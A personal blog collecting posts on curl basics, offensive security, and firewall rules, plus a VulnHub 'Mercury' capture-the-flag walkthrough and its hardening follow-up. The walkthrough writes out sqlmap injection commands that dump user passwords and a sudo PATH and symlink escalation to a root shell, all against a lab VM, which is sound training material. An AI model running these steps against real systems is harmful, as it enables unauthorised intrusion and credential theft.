General Tips

Core Tools to Know: curl

'curl'-y pig's tailAs all bloggers eventually find out, two of the best reasons to write blog posts are either to document something for yourself for later or to force yourself to learn something well enough to explain it to others. That’s the impetus of this series that I plan on doing from time to time. I want to get more familiar with some of these core tools and also have a reference / resource available that is in “Pete Think” so I can quickly find what I need to use these tools if I forget.

The first tool I want to tackle is curl. In the world of command-line tools, curl shines as a flexible utility for transferring data over various network protocols. Whether you’re working on the development side, the network admin side, or the security side, learning how to use curl effectively can be incredibly beneficial. This blog post will guide you through the very basics of curl, cover some common use cases, and explain when curl might be a better choice than wget.

What is curl

curl (Client for URL) is a command-line tool for transferring data with URLs. It supports a wide range of protocols including HTTP, HTTPS, FTP, SCP, TELNET, LDAP, IMAP, SMB, and many more. curl is known for its flexibility and is widely used for interacting with APIs, downloading files, and testing network connections.

Installing curl

Before diving into curl commands, you need to ensure it is installed on your system. Lots of operating systems come with it. In fact, even Windows has shipped with curl in Windows 10 and 11.

For Linux:

sudo apt-get install curl  # Debian/Ubuntu
sudo yum install curl      # CentOS/RHEL

For macOS:

brew install curl

For Windows
You can download the installer from the official curl website if it isn’t already on your system. To check, just type curl –help at the command prompt and see if it understand the command. If you get something back like this, you’re all set.

C:\Users\peteonsoftware>curl --help
Usage: curl [options...] <url>
 -d, --data <data>           HTTP POST data
 -f, --fail                  Fail fast with no output on HTTP errors
 -h, --help <category>       Get help for commands
 -i, --include               Include response headers in output
 -o, --output <file>         Write to file instead of stdout
 -O, --remote-name           Write output to file named as remote file
 -s, --silent                Silent mode
 -T, --upload-file <file>    Transfer local FILE to destination
 -u, --user <user:password>  Server user and password
 -A, --user-agent <name>     Send User-Agent <name> to server
 -v, --verbose               Make the operation more talkative
 -V, --version               Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".

The Most Simple Example

The simplest way to use curl is to fetch the contents of a URL. Here is a basic example that will will print the HTML content of the specified URL to the terminal:

c:\
λ curl https://hosthtml.live
<!doctype html>
<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_M6heeSY2n3p1IRsqfcIljkNrgqYXDBDFSWeybupIpyihjfHMZhFu8kniDL51hLxUnYHjgmcv2EYUtXfRDcRWZQ==" lang="en" style="background: #2B2B2B;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC">
    <link rel="preconnect" href="https://www.google.com" crossorigin>
</head>
<body>
<div id="target" style="opacity: 0"></div>
<script>window.park = "eyJ1dWlkIjoiZDFhODUxY2ItOTUyZi00NGUyLTg4ZWMtMmU3ZGNhZmE1OTk0IiwicGFnZV90aW1lIjoxNzIwNzMyMzQxLCJwYWdlX3VybCI6Imh0dHBzOi8vaG9zdGh0bWwubGl2ZS8iLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6e30sImhvc3QiOiJob3N0aHRtbC5saXZlIiwiaXAiOiI3Mi4xMDQuMTY5LjE1NCJ9Cg==";</script>
<script src="/bwjblpHBR.js"></script>
</body>
</html>

Some Useful Examples to Actually Do Stuff

Downloading Files

# To download a file and save it with a specific name:
curl -o curlypigtail.jpg https://peteonsoftware.com/images/202407/curlytail.jpg

# If you want to save the file with the same name as in the URL:
curl -O https://peteonsoftware.com/images/202407/curlytail.jpg

Sending HTTP Requests

# GET requests are used to retrieve data from a server. The basic example is already shown above. 
# To include headers in the output, use the -i option:
curl -i https://hosthtml.live

# POST requests are used to send data to a server. 
# This is particularly useful when interacting with APIs. 
curl -X POST -d "param1=value1&param2=value2" http://somereallygreat.net/api

# Many APIs now accept JSON.  This is how you'd send that
curl -X POST -H "Content-Type: application/json" -d '{"key1":"value1", "key2":"value2"}' http://somereallygreat.net/api

# Without explaining it, we included a header above (-H).  That added a Content-Type header.  
# To add an Auth header, you might do something like this
curl -H "Authorization: Bearer token" http://asitethatneedsbearertokens.com

Cookies

# To save cookies from a response
curl -c cookies.txt https://www.google.com

# To send cookies with a request
curl -b cookies.txt https://www.google.com

When to Use curl Over wget

While both curl and wget are used to transfer data over the internet, they have different strengths. Daniel Stenberg is the creator of curl (and also contributes to wget) and he’s published a more lengthy comparison here. I defer to the expert, but here are some of my big takeaways.

curl Advantages

  • Flexibility: curl supports a wider range of protocols (like SCP, SFTP) and provides more options for customizing requests.
  • Availability: curl comes preinstalled on macOS and Windows 10/11. wget doesn’t.
  • Pipelining: curl can be used to chain multiple requests together, making it powerful for scripting complex interactions.
  • Reuse: curl is a library (libcurl), while wget is just a command line tool.

wget Advantages

  • Recursive Downloads: wget can download entire websites recursively, making it ideal for mirroring sites.
  • Simplicity: For simple downloading tasks, wget might be more straightforward and easier to use.

curl is a versatile tool that – once mastered – can simplify many network-related tasks. From downloading files to interacting with APIs, curl provides the flexibility and functionality needed for a wide range of applications. While wget has its strengths, particularly for simple downloads and recursive website copying, curl shines in its versatility and extensive options for customizing requests.

InfoSec

Understanding Offensive Security

A robot arm holding a robotic sword over a laptop representing Offensive SecurityAt first blush, Offensive Security can seem like an oxymoron or a misnomer. Are we saying that the best defense is a good offense? Not really. When people say that in the traditional sense, they usually mean that by attacking, you don’t give your opponent a chance to attack you, therefore there is less for you to defend against. That’s not what we’re doing here. We are not out attacking the “bad guys” in an attempt to tie up their resources to keep them from attacking us. What we’re really talking about is attacking ourselves internally or through a third party vendor.

Offensive security refers to proactive measures taken to identify, assess, and mitigate vulnerabilities within a system before malicious hackers can exploit them. Unlike defensive security, which focuses on protection and prevention, offensive security involves simulating attacks to uncover weaknesses and bolster defenses. This approach is also known as ethical hacking or penetration testing.

The hacking is “ethical”, because the people performing the exercise have permission to do it and share all of their results with the target and don’t keep, use, or share any vulnerabilities or data they might uncover with the outside world. Penetration testing (pen testing) is a process that involves simulating cyberattacks to identify vulnerabilities in a system, network, or application. Ethical hackers use the same techniques as malicious actors to find and fix security flaws.

Taking this up a notch is something called Red Teaming. Red teaming is an advanced form of penetration testing where a group of security professionals, known as the red team, emulate real-world cyberattacks over an extended period. Their goal is to test the organization’s detection and response capabilities. These groups perform vulnerability assessments, which involves systematically examining systems for vulnerabilities, typically using automated tools. While less thorough than penetration testing, vulnerability assessments provide a broad overview of potential security issues. In addition, offensive security professionals will often use social engineering attacks to exploit human psychology rather than technical vulnerabilities. Offensive security professionals also often conduct phishing simulations and other tactics to test an organization’s security awareness.

So that explains a little of what these teams do, but let’s consider a little more of the why.

  • Proactive Defense: Offensive security allows organizations to identify and address vulnerabilities before they can be exploited by attackers. By staying one step ahead, companies can significantly reduce the risk of data breaches and other security incidents.
  • Improving Security Posture: Regular penetration testing and vulnerability assessments provide actionable insights that help organizations strengthen their security posture. This ongoing process ensures that defenses evolve in response to emerging threats.
  • Compliance and Regulatory Requirements: Many industries have strict compliance and regulatory standards that mandate regular security testing. Offensive security practices help organizations meet these requirements and avoid potential fines and penalties. I can tell you that in several audits and compliance engagements that I’ve had recently that they’ve wanted evidence that we regularly conduct offensive security operations against our company.
  • Incident Response Preparedness: Red teaming exercises and other offensive security activities help organizations test and refine their incident response plans. This ensures that in the event of a real attack, the organization is prepared to respond quickly and effectively.

Ethical Hackers (or White Hat Hackers) are the backbone of offensive security. We’re talking about individuals who have the skillset to “be the bad guys” (Black Hat Hackers), but instead earn a living helping others be prepared. The important thing, though, is that you don’t have to be born a hacker, spend time in the seedy underbelly of the internet, nor wear all black to go into this field. There is a lot of reputable training available and some respected certifications that you can get that can help your employment chances in the field (CEH and OSCP to name two).

If you’re interested, give it a shot. There is almost no barrier to entry. Sites like TryHackMe and HackTheBox have free tiers and there are tons of YouTube channels offering training and walkthroughs and advice. I plan on spending a fair amount of time in future posts talking about various security topics – often from the Offensive Security angle – and working through some of the problems available to us on places like TryHackMe, HackTheBox, and VulnHub so that I can also give back a little and add one more resource to the pile in gratitude to what has been given to me, so stay tuned for that.

InfoSec

Locking Down Mercury

A composite image of Mercury behind cartoon jail bars, both images from PixabayIn my last post, I did a walkthrough for the VulnHub box The Planets: Mercury. This box was conceived and implemented to be low hanging fruit for people who enjoy Capture the Flag (CTF) exercises. The advice for much of what we used to gain our initial foothold are pretty basic. The advice should be pretty familiar to anyone who takes security hygiene seriously and certainly anyone who is running a production web server. Additionally, Injection (SQL and otherwise) is on the OWASP Top 10 consistently. It should be one of the things that should be checked and remediated early, but often isn’t. Nevertheless, we weren’t splitting atoms to find it or to suggest how to fix it. Here are the basic “Don’ts” from the Mercury CTF:

  • Don’t leave default error pages in place
  • Don’t leave public “to do” lists
  • Don’t construct SQL Queries using blind concatenation
  • Don’t leave text files with passwords in plain text (or any encoding) on the server

But none of those are how we gained root on the box. We took advantage of a misconfiguration on the server that was intended to let the user read from a log file. The Mercury box wanted to allow the user to read records from the /var/log/syslog file. Normally, that file requires elevated permissions to read it. The Admins on this example box chose to create a script that reads the last 10 lines from the file and then gave the user permissions to run sudo on this script. Unfortunately, we were able to use symlinks to cause that script to allow us to ultimately open a root shell instead.

But what could the Admins have done differently? The best solution here is probably using Access Control Lists (acls). Linux file systems for a few generations have supported these by default. To work with them, we can just install a package and then configure the permissions.

Take a look at these simple commands that could have prevented this avenue of privesc on Mercury.

# Install the acl package
# In Debian-based systems
sudo apt-get install acl
# In RedHat-based systems
sudo yum install acl

# See if your file systems supports ACLs
grep acl /etc/mke2fs.conf

# If they do, you will see acl in the default mount options
default_mntopts = acl,user_xattr

# If not, you should be able to run this command to set it up
# This has not been tested by me, as every Linux box I could find already had the permissions
sudo mount -o remount,acl /

# Looking at the ACL on the file to start, we see that I (user) have read and write
# the adm group has read, and everyone else has no permissions.
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
group::r--
other::---

# Now I'm going to configure a user to have read permissions using
# setfacl which was added when we installed the acl package
sudo setfacl -m u:exampleuser:r /var/log/syslog

# Let's check again
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
user:exampleuser:r--
group::r--
mask::r--
other::---

# You notice that now we have another user row in the output, saying
# that example user has read permissions on the file

That’s it! It took me a total of less than two minutes and this avenue of escalation could have been prevented. This is a good example of how thinking like an attacker can help you be a better Administrator if you think about how every change you make to a system could be exploited and then think about a better way. When in doubt, look for guidance, don’t get “creative”.

Capture the Flag

VulnHub Walkthrough – The Planets: Mercury

An image of the planet Mercury, from PixabayIn this post, I want to take you through a walkthrough of how to hack your way into an intentionally vulnerable VM provided by VulnHub and created by user SirFlash. You can see more about this exercise and download your own copy of the .ova file to follow along here. I’ve found that the easiest way to run this VM is with VirtualBox, but you do have to do some specific setup/configuration for the machine to work like we want it to. Because we can’t get into the machine, we can’t really configure very much, so the VirtualBox settings are key.

In addition to VirtualBox, you need a machine to do the penetration test from. Kali Linux is very popular, though I have worked through several of these kinds of exercises with Linux Mint. Kali isn’t meant to be a “daily driver” OS and is just a version of Linux with a lot of tools preinstalled. You can install your favorite tools yourself on any distro that you’d like, or even use another preconfigured one (like Parrot, Black Arch, etc). Many tools are also available on Windows, especially if you have Windows Subsystem for Linux installed and configured. However, if you are ever working through tutorials, walkthroughs, books, videos, or forums, Linux is almost always assumed. There are a lot of resources to get started with Linux and it isn’t nearly as daunting as you’d think.

Just as a note, this machine is in a category called “Capture the Flag” (CTF). This is a fun style of game where you can practice certain skills, techniques, and problem solving abilities. It, however, isn’t necessarily indicative of “real world” penetration tests. My goal is to talk through my thought process as we walk through so you can see how I’m using some of the techniques I’ve learned to operate within the guidelines that CTFs often have. Feel free to just read this through as information, but it is also very fun and beneficial if you can follow along.

I’m starting from the assumption that you’ve already installed VirtualBox, downloaded the Mercury.ova file, and have a machine to attack from.

Getting Started

After you download the Mercury.ova file, open VirtualBox. Click the File menu, and then select Import Appliance
VirtualBox File Import Appliance

Next, you will be prompted to locate the file to import. Make sure your source is “Local File System” and then use the file selector to navigate to where you downloaded the .ova file.
VirtualBox File Import Step Two

Then, you’ll be shown a summary of settings. I was fine with what was here and I clicked Finish.
VirtualBox File Import Step Three

It will do its thing and when it is done, you will see the Mercury VM show up in your list of VMs on the left hand side.
VirtualBox Mercury Fully Imported

Next, with the virtual machine selected, you’ll want to click the orange Settings Gear (1), then select the Network menu (2), choose Host-only Adapter from the Attached to: drop down (3), and click OK (4). This will close the dialog box. Then click the green Start button (5) to start the VM. It is possible that you may not have a Host-only Adapter properly configured. If not – and because these details have changed in the past – just work through this Google Search. We’re doing this as a good way to allow VM to VM communication and that’s all.
Setting the VirtualBox Host Only Adapter

Once you’ve hit the play button, the machine will start up and you’ll see some Linux OS information go by and then the box will finally get to a login prompt. This means you’re ready to go. You can now minimize that window and get ready to work.
Mercury VM Login Prompt

For my environment, I have another VirtualBox VM of Kali that I changed the network adapter to Host Only from its normal NAT setting to do this exercise. I booted that up and logged in. The first thing we need to do is make sure we have netdiscover on our box. Kali is Debian based, so it uses apt to install things by default. I opened a terminal and I issued the command sudo apt install netdiscover. I had already entered my sudo password before this, so I wasn’t prompted, but you might be. I also already had this on my box, so your command window may look differently during and after the install.
apt install netdiscover

Then, I ran an ifconfig to see what my available network interfaces were. You can see that I have two network interfaces. One is called eth0 and the other is lo. lo is my local loopback interface, so eth0 is the one I want. Yours may be called something different for many reasons, including how you configured your adapters within VirtualBox.
ifconfig results

Next, I ran the command sudo netdiscover -i eth0. That brought up an auto-updating table that scanned every possible network address connected through that interface (-i eth0). Our goal here is to find out what IP Address the Mercury VM is at. If you aren’t sure, you can scan each one, but in this case, I know it is the one located at 192.168.56.101.
Netdiscover Results

That means that it is now time to scan the box. This is our first “this is a CTF, not real life” warning. All of the scans I’m doing here are “noisy”. What that means is that I’m not sneaking around. I’m running these so they take less time from my perspective and are as instrusive as possible. If I was really doing a penetration test on someone, their monitoring tools would light up. It would be like a criminal pulling up to your house in a loud truck blaring music and wearing jingle bells as they used a battering ram on your front door.

Warning aside, I ran nmap -sC -sV -p- -T4 –min-rate=9326 -vv -oN mercury_nmap.log 192.168.56.101. That command breaks down that I’m using default scripts (-sC) and I’m going to try to detect versions (-sV), I’m scanning all 65535 ports (-p-), I’m going super fast (-T4, where 5 is the highest/fastest), I’m going at 9326 packets per second at least (–min-rate=9326), I want the outputs very verbose (-vv), I want the output to a file called mercury_nmap.log (-oN mercury_nmap.log) and lastly that we’re going to scan 192.168.56.101. Why 9326 packets per second? No real reason that I’m aware of except that someone I was learning from used it once, so I do.

That scan returned a lot of results, but the main things we learned from it are:

Nmap scan report for 192.168.56.101
Host is up, received conn-refused (0.00054s latency).
Scanned at 2024-03-22 16:11:14 EDT for 96s
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2

So this machine exposes a web server and has secure shell (SSH) open. My next step is also now built on CTF mentality. I’m assuming that SSH is mid-game in our chess match. I figure I’m supposed to learn something from the web server first that will make the SSH part a little easier. So, I navigated to http://192.168.56.101:8080 and got this.
Mercury's Default Webpage

Sometimes, in CTFs, the developers will leave clues in the Source. In this case, that text is all there is. It isn’t even HTML. So my next step was to use a tool to enumerate the website to try to find directories that aren’t linked to by just “guessing” from curated wordlists and seeing what hits. In this case, I used the command gobuster dir -w /usr/share/wordlists/dirb/common.txt -o mercury_gobuster.log -u http://192.168.56.101:8080. This just used the gobuster program in directory mode (dir) with the wordlist (-w) of common possibilities, outputting (-o) to a log file against the url (-u) of our website. One of the benefits to using a box made for Offensive Security is that they often come with wordlists like this, though you can find them online, download them, and use them wherever you’re working from.
My gobuster results

Well, the only thing we found is a robots.txt. Because we didn’t find anything else, I did try some larger and larger lists, but they also returned only the robots.txt. I guess that means we should check it out.
Robots.txt Contents

Wow. That’s almost amazing in its uselessness. Now, we are at another point when I took a shot. I know a few things. 1) This box is marked as “Easy” and 2) This is a CTF. Some CTFs (especially harder ones) might have an open port with a trail for you to follow and even more work than this all for it to lead to nothing but a waste of time. But, because this is Easy, I wanted to try to see if causing an error would give us information. Maybe the error page would give us Server OS info and we could try an exploit, or reveal something else entirely. So, I navigated to http://192.168.56.101:8080/showmea404 in an attempt to see the 404 page.
The Mercury 404 Page

Jackpot. This server is using Django (useful), but even more useful is that it tried to resolve my URL by checking the index (we know about that), the robots.txt (ditto), and in a directory called mercuryfacts. Hmmmmm, that sounds promising. Let’s navigate to http://192.168.56.101:8080/mercuryfacts
The Mercury Facts Home Page

Here we go! We can load a fact and we can see their Todo List. (The Todo List is the sort of thing that is often left in HTML comments in these). So, I checked the Todo link first and found this
Mercury Facts Todo

Okay, information! We know there is either a users table that exists or they are using some (probably poor) other means of authentication in the interim. Also, they are making direct mysql calls (I’m smelling some possible SQL Injection!). What about that other link? I clicked it and it took me to fact 1. I went back and clicked it again and again and the fact isn’t random, this is all get and there is no navigation. So, I started just changing the number. First I went to 2 and got another fact, then to 999 and got no fact. Lastly, I tried a fact id of “pete” and that got me an error page (see how we love error pages that leak information!?)
Mercury Facts Enumeration

What we see in that error is that they are just taking the value from the url and just sticking it into a SQL query. Because we had a word and not a number, mysql thought I was trying to address a column in the where clause. I don’t need to go any further, I’m going to jump right into sqlmap to try to exploit this. sqlmap is a tool that attempts sql injection several different ways. When it works, you can dump databases, get table data, and all kinds of good stuff.

The first thing I tested was whether or not this would actually work. So, I issued the command sqlmap -u “http://192.168.56.101:8080/mercuryfacts/1” –dbms=mysql –risk=3 –level=5 –technique=U. In this case, the -u is our URL, the –dbms is telling it which database product to try to hit. We know mysql from the todos, but sqlmap can also guess if you don’t provide that. The risk and level values are just about the noise we’re willing to make and how hard we want the tool to try. Lastly, the –technique=U is telling it to do SQL UNIONS in an attempt to exfiltrate the data.
sqlmap initial results

We see that this comes back and the parameter is injectable. This means we can try something else. In this case, I issued the command sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 –dbms=mysql –risk=3 –level=5 –technique=U –tables. That’s very similar except that I added –tables so it would dump the tables. We got this

sqlmap identified the following injection point(s) with a total of 119 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: information_schema
[78 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
              -- SNIP -- 
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

Database: mercury
[2 tables]
+---------------------------------------+
| facts                                 |
| users                                 |
+---------------------------------------+

Okay, the first information_schema db is just something that is a feature of the dbms. I –SNIP–‘ed a lot of that out of there so you could see it, but let’s not have it clog us up. We care about the mercury db and its two tables: facts and users. If we remember, the Todo list wanted to start using the users table, so we’re very interested. Let’s dump it. sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 –dbms=mysql -D mercury -T users –dump –batch –technique=U –level=5 –risk=3. Our only change this time is to remove the request to list the tables and instead specify the database name (-D mercury) and the table name (-T users) and tell it to –dump it in a –batch.

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7162707a71,0x71554a4b637448434261574e63514344716a56734371626a667a586a62507555586a635a4b717549,0x7176786a71)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

Here we go! We have some usernames and plain text passwords. Now we can try to see what that SSH has got going on! Incidentally, if you examine the results of these scans, it took the tool 119 requests to dump the databases and tables and 49 requests to just get these 4 rows of one table. See what I mean about noisy?

Let’s use the webmaster account to get into the box. It seems like the ranking account. In addition, it has the best password, so I’m guessing it has the juicy stuff. So now we issue the command ssh webmaster@192.168.56.101 and then hit enter. Enter the password and accept the fingerprint as you’re asked and we’re in. The first thing I did was an ls to list the contents of the directory and there is a user_flag.txt right there. I issued a cat user_flag.txt command and we have our user flag!
SSH into Mercury

The thing about CTF boxes is that there is often a User flag and then a Root (or Admin) flag. We’re only half done. Might as well keep exploring. What’s in this mercury_proj directory? To find out, I typed cd mercury_proj/ && ls and saw a notes.txt file. I called cat notes.txt and got 2 users and 2 passwords of some sort. So, we know the webmaster password, so if we can work out the encoding or hashing, we might have a shot. At a minimum, this looks like Base64 encoding (the == padding at the end of the linuxmaster user’s password is often a giveaway as = is used as padding in base64). But just because it is base64 doesn’t mean that’s the answer, encryption will often use base64 as the final step so all of the characters are printable. But, I use the echo command to echo each value and then pipe (|) it into the base64 utility, asking it to –decode. We see that the webmaster password is the one we know, so we can trust that this linuxmaster password is probably their password value.
Base64 Encoded Passwords

We can check that immediately by calling su linuxmaster and providing that password. It is accepted and a whoami tells me that I’m now linuxmaster. Is this over now? Is it this easy? We wish! I dug around but didn’t find any other flags, so I’ll spare you those searches.
Changing to Linuxmaster user

That means that our next step is likely privilege escalation. There are a few ways to go, but one of the easiest is to look and see what applications that the user might be able to call sudo on and act as root. Issuing the command sudo -l will tell you just that.
Finding Linuxmaster sudo Permissions

Okay, so we can run a specific bash script as sudo. Oh, that’s good news. Sometimes, we can edit what’s in the file and just do whatever we want. Other times, we can take advantage of what’s in the file and take advantage of the command another way. Let’s see what we’ve got. In the image above, you can see that I followed that up with cat /usr/bin/check_syslog.sh to see what’s in the file. It just calls the Linux tail program to get the last 10 lines out of the /var/log/syslog file. This is actually a common kind of misconfiguration. The /var/log/syslog file needs elevated permissions or at least very specific permissions in order to read it. Instead of creating a group and giving that group permission to the file or using access control lists (ACLs), the admin figured he could give this user (and perhaps others) sudo permission on this script that only did one simple thing. But, they weren’t expecting this.

Linux (as well as many operating systems) store files in directory structures. The correct way to call every single program is to give its full path every time. We don’t do that. We just want to type ls or cat, not /bin/ls and /bin/cat or /usr/bin/ls and /usr/bin/cat. That’s where the path variable comes in. It defines a bunch of places/directories (in order) that the operating system is going to look for the thing you asked for. We can see what that should have been above. When using sudo, it is supposed to ignore your normal PATH and use the secure_path, which in this case for this user was declared as /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, /sbin, /bin, and /snap/bin.

We’re going to take advantage of this because you also see that we have the env_reset permission when using sudo. That lets us CHANGE where all it is willing to look for commands. So, what we’re going to do is create a symlink (think shortcut, of sorts) in our current directory called tail that actually points to /bin/vi. That means whenever the current directory is in the path and someone calls tail, vi will run instead. Some of you who are familiar with vi or vim will know that it can basically run like its own little operating system. So, if I can run get this bash script to run as sudo and then open vi, I can then do things within vi as root. Here are the steps:
We actually take advantage of the flaw

In this case, the first thing I do is make sure I’m in my home directory, somewhere I have full permissions, just in case (cd ~). Then I create a symlink (ln -s) pointing to /bin/vi whenever someone calls the command tail (which is called from within that script). So, I update my own PATH variable to be my current directory plus the existing path variable. export PATH means I’m making that environment variable, the equals sign means I’m assigning whatever is on the right hand side to the variable. The . is my current directory (where I put the symlink), the : is concatenating these values, and $PATH is the current PATH environment variable. So in one sentence, I updated my local PATH environment variable to include what it already had, but putting my current directory in first position so it is checked for a command match there first.

The next line is me doing a typo, you can ignore it. I left it in to show that I’m human, too ๐Ÿ˜‰ But the right version of the command says sudo –preserve-env=PATH /usr/bin/check_syslog.sh. I’m calling for the elevated permissions, but then I’m using –preserve-env (because we have the env_reset permission) to use my new PATH environment variable (which includes my local directory) instead of the one carefully defined for me in secure_path. When I hit enter, vi automatically opens.
Our VI Window

If I type :, I’m automatically popped into command mode and typing shell and hitting enter opens a shell in my current context, which thanks to the sudo call on the check_syslog.sh file, is root. You can see here that I type whoami and I’m told that I’m root. I issued a cd ~ && ls command to change into root’s home directory and list out its contents. I see that there is a root_flag.txt file and a quick cat root_flag.txt and we can see that file’s contents.
We are root and showing the root flag

That’s it. In doing this box, we used the following skills:

  • nmap scan
  • gobuster scan (directory enumeration)
  • Found Error Page misconfiguration
  • Detected and exploited SQLi (SQL Injection)
  • Luck (found additional credentials)
  • symlinks
  • Misconfigured permissions, specifically around sudo and the secure_path variable

Not bad for a day’s work! Next time, I’ll take off a Red Team hat and put on a Blue Team hat and explain how the Administrators could have better protected this file and the sudo permissions (if they used them anyway).

InfoSec

Firewalls: Rules? A Guide with Examples

Rules are meant to be broken… as long as it’s not my rules

Signs representing a lot of rules

Introduction

Previously, we’ve talked about what firewalls are and what types of firewalls exist. This time, I want to dig into what kinds of rules these firewalls have that make them work as the last post in my Firewall miniseries.


Basic Firewall Rules and Configurations

For some of these rules examples, I’m going to include one way to declare each rule using iptables, which is available as a very simple host-based firewall on Linux system. (The Wikipedia summary is that iptables is a user-space utility program that allows a system administrator to configure the IP packet filter rules of the Linux kernel firewall, implemented as different Netfilter modules). I chose to use examples this way because it is indicative of the general thought process that is used to create these kinds of rules, even if the syntax can vary. This isn’t an iptables tutorial and a total and proper implementation for each example might contain other commands, as well.

Other examples are more complicated and aren’t really suited for iptables and I give some simplified examples for other products in the marketplace that meet the challenge.

IP Address-Based Rules

  • Example Rule: Deny all traffic from external IP 142.250.189.174 to any IP within the network.
  • Use Case: This rule is useful when you want to block specific external threats known by their IP addresses.
  • Simple Implementation: sudo iptables -A INPUT -s 142.250.189.174 -j DROP
  • Implementation Explanation: sudo executes the command as a super user (Administrative permissions). iptables is the Linux command utility program. -A INPUT explains that this is a rule for inbound packets. -s 142.250.189.174 means that this rule applies to packets coming from the source (the -s) of 142.250.189.174. -j DROP means that the result will jump (-j) to the DROP action, meaning the packet will not be passed along to the rest of the system.

Port-Based Rules

  • Example Rule: Allow TCP traffic only on port 443 (HTTPS).
  • Use Case: Ideal for web servers that should only communicate via web traffic ports.
  • Simple Implementation: sudo iptables -A INPUT -p tcp –dport 443 -j ACCEPT && sudo iptables -A OUTPUT -p tcp –dport 443 -j ACCEPT
  • Implementation Explanation: We covered sudo iptables -A INPUT and -j ACCEPT above. The -p tcp means that this rule applies to the protocol (-p) of TCP and destination port (–dport) of 443. && just allows us to put two Linux commands in one line. Then the only difference in the second command is that we’re making a rule to allow outbound traffic as well as inbound traffic (-A OUTPUT).

Protocol-Specific Rules

  • Example Rule: Allow ICMP (Internet Control Message Protocol) for internal network devices only.
  • Use Case: Useful for allowing internal network testing and diagnostics while blocking potential external pings or other ICMP-based attacks.
  • Simple Implementation: sudo iptables -A INPUT -s 192.168.1.0/24 -p icmp -j ACCEPT && iptables -A INPUT -p icmp -j DROP
  • Implementation Explanation: In this case, our source (-s) is given as a subnet. You’d put whatever subnet represents your internal network (this is a shorthand way to represent every possible IP address that can exist on a network). The protocol (-p) is icmp and we will jump (-j) to ACCEPT. Again, we && to put two commands together and then create another rule that drops all other ICMP packets. It is important that these rules are included in this order or else the broad DROP will execute first before the limited ACCEPT rule is considered.

Stateful Inspection Rules

  • Example Rule: Allow outgoing traffic on any port but restrict incoming traffic to responses to established connections only.
  • Use Case: This is common for businesses that want to ensure outbound traffic is unobstructed while maintaining tight control over incoming requests.
  • Simple Implementation: access-list YOUR_ACL_NAME extended permit tcp any any established
  • Implementation Explanation: This rule is using a Cisco ASA, which has stateful firewall capabilities. In this case, this rule assumes you already have an access list (here represented by YOUR_ACL_NAME) and you address the access-list named YOUR_ACL_NAME and extended (rather than standard) will filter traffic on multiple criteria. In this case, we are allowing (permit) tcp traffic from any address to any address as long as it was already established.

Time-Based Rules

  • Example Rule: Blocking all inbound traffic during non-business hours.
  • Use Case: For organizations that want to limit access during off-hours for security purposes.
  • Simple Implementation: It’s complicated ๐Ÿ˜‰
  • Implementation Explanation: There are a few ways to do this. One way is to run cron jobs (scheduled jobs) on your Linux server that add and remove iptables rules at the appropriate times. Other firewalls, like pfSense Plus and OPNsense make it easy through an interface. Here are the steps to do this in OPNsense:
    1. Define a Schedule: First, go to “Firewall” then “Schedules” in OPNsense. Create a new schedule and define the time periods (8 am to 5 pm) and the days of the week (Monday to Friday).
    2. Create Firewall Rule: Next, create a firewall rule under “Firewall” > “Rules” and select the interface where the rule should apply. Configure the rule to match your desired traffic (e.g., set the action to “Pass” for allowing traffic).
    3. Apply the Schedule to the Rule: In the rule settings, you will find an option to apply the schedule. Select the schedule you created in the first step.
    4. Activate and Test the Rule: After saving the rule, it will become active according to the schedule. Itโ€™s important to test the rule to ensure it behaves as expected during the specified times.

Configuring Your Firewall

